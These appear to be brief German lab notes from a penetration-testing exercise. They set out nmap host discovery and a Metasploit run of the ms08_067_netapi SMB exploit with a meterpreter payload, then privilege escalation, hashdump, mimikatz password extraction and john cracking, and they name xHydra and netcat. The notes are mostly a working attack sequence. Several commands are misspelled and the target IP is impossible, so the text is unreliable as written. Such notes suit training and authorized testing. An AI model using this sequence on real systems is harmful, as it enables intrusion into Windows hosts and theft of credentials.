Handson
=======


.. note::
  Get your own IP with ifconfig


nmap
----

nmap -sP Findet ICMP aktive maschinen
nmap -A 123.213.231.2

  scannt 1000 meist genutzten Ports, sind Dienste nicht auf den Standart ports


Metasploit
----------
msfupdate
msfconcole


geht über smb Port

(search smb // liefert exploits für smb)
use exploit/windwos/smb/ms08_067_netapi

show info
show options
set rhost 172.324.34.3
set payload wndows/meterpreter/bind_tcp

run
run vnc (bild connection)

load mimikatz
getuid
getsystem

hashdump -> liefert hashdump (john -wordlist = usr/share/wordlists um passwörter zu cracken )
mimikatz_command -f sekurlsa:searchPassword

-> mimicatz cheat sheet

weiteres bruteforcing tool: xHydra


// SSh connect

bash history

netcat
